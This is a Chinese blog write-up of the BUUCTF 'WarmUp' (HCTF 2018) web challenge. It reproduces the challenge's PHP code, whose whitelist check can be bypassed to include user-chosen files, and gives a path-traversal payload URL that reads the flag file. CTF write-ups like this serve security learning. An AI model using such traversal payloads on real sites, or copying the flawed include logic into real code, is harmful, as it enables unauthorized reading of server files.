buuctf web第二题代码审计

最新推荐文章于 2024-04-22 16:59:45 发布
最新推荐文章于 2024-04-22 16:59:45 发布
阅读量777 收藏
点赞数
分类专栏: ctf 安全 web 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44740774/article/details/127035659
版权
ctf 同时被 3 个专栏收录
6 篇文章 0 订阅
订阅专栏
web
6 篇文章 0 订阅
订阅专栏
安全
4 篇文章 0 订阅
订阅专栏

发现过程:

  1. 进入到页面只看到一张图片,这时有两种方式来发现代码
    a. 进行目录扫描,发现可能存在的目录
    b.F12 看html源码,在里面有提示source.php,直接访问即可

  2. 看到代码后发现白名单里还有一个文件,尝试访问一下,能够得到flag所在的文件

  3. flag·获取步骤如下:

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }
            //截取传入的字符串

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            //判断截取后得字符串在白名单中是否存在
            if (in_array($_page, $whitelist)) {
                return true;
            }
            //url解码

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
             //再次判断截取后得字符串在白名单中是否存在
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    //参数是file

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>
1. 进行代码审计

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }

这其中包含include,联想到文件包含,但文件包含需要通过if的三个条件,当三个条件都为true时才会执行文件包含,前两个条件容易满足,最后一个需要看emmm类中的checkFile函数

2.查看checkFile函数
<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }
            //截取传入的字符串

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            //判断截取后得字符串在白名单中是否存在
            if (in_array($_page, $whitelist)) {
                return true;
            }
            //url解码

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
             //再次判断截取后得字符串在白名单中是否存在
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

这个函数只判断了我们传入的参数中是否包含了白名单里的字符串,并没有对我们传入的字符串做任何修改,所以最简单的想法就是我们传入的参数中必须包含白名单里的字符串

4.构造payload
  1. 根据第一步代码审计可知参数为file,所以构造payload为
http://5c2edc9d-19b2-48f1-8146-1568569d9074.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg
  1. 解释:…/:返回到上一层目录
梦飞心沉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HCTF 2018]WarmUp详解
qq_52364123的博客
04-10 242
BUUCTF-[HCTF 2018]WarmUp-代码审计
ctfshow代码审计
qq_61768489的博客
01-26 1268
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问的,因为sql语句依旧是正常执行了。似乎没有调用,与上一样,换一种方式,有报错信息就试试报错注入。
Buuctf-Web-[HCTF 2018]Warm Up 解&代码审计
m0_62239233的博客
04-22 1367
Buuctf-Web-[HCTF 2018]Warm Up 解&代码审计
buuctf之WarmUp
qq_38634097的博客
04-17 496
通过代码审计,我们知道了需要满足三个条件,前两个为file不为空且为字符串,那么可以构造pyload为:?file=hint.php.(我们已经知道source.php文件源码是什么了,所以直接用hint.php即可)我们已知,hint.php在白名单,flag在ffffllllaaaagggg,mb_strpos($page . '?结合已知条件,再次进行代码审计,寻找突破口。开一张笑脸,无他,查看网页源码,看到提示source.php,在url后加/source.php,打开结果如下,
CTF-Web-代码审计11
weixin_38131137的博客
07-04 1349
上一周新找的靶场里面的,最近太忙,花了快两周才做完,记录一下,免得做完忘记思路。 1、http://395115b6e98f1b6b21ee56eb5ef89614.synctf.com:8002/basic/base09/ 直接看到代码 可知道这个是文件包含?file=flag.txt 所以直接构造?file=flag.php 得到一段代码 可知这是一段加密代码,解密的话要用到decrypt,密钥有,相关要解密内容也有,直接写一段新的解密代码 编译得结果flag 2、http://3951..
buuctf web warmup详细
weixin_64160292的博客
03-31 3074
目:warmup 目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成...在进行代码审计时,务必关注这些潜在的风险点,以提高应用程序的安全性。
BUUCTF逆向前八
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向目,通过这些目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道首先使用exeinfo查看文件信息,确认...
BUUCTF部分web
最新发布
05-06
记录
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTFweb之强网杯2019随便注
12-14
1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show ...
[HCTF 2018]WarmUp
1ance's blog
11-17 1702
文章目录环境解思路总结 环境 BUUCTFweb的第一,启动靶机,访问链接。 ·http://f53eba82-0f2f-4f96-8120-1c4e8a4711c2.node4.buuoj.cn:81/ 解思路 根据目提示是代码审计。 查看源码,发现有提示source.php。 访问看看,果然发现php源码,接下来就是审计代码绕过了。 <?php highlight_file(__FILE__); class emmm { public sta
浅谈 php原生类的利用 1(文件操作类)
weixin_63231007的博客
05-13 2119
前言 在学习的过程中,战队里的师傅给我发了一道之前没遇见过的反序列化,引出了原生类这个方面。这一知识点在后面刷时也会遇到,提前学习一下。借这道,对原生类的知识点进行一下学习与记录。 例: <?php highlight_file(__FILE__); class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public functio
GKCTF2020 web+misc
xlcvv的博客
05-25 1155
CheckIN(unsolved) 考点:代码审计,绕disable_functions 目给了源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() {
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
攻防世界:warmup详解_攻防世界warmup(1),离开小厂进大厂的第一周
2401_84263434的博客
04-11 710
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFshow 代码审计
starttv的博客
11-30 894
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
CTF-web 第三部分 代码审计
iamsongyu的博客
10-09 5845
http://www.mxcz.net/tools/rot13.aspx rot-13加密解密 http://www.zjslove.com/3.decode/ 凯撒 当铺 倒叙 维吉尼亚密码 实际上就是阅读有关的校验代码,人为构造特殊的输入或者参数才能拿到flag。需要了解一般的变量命名,判断语句和常用函数等,对于函数的执行流程还是很容易理解的,编程的关键点如下: 一些基本的语法含义 php编程...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值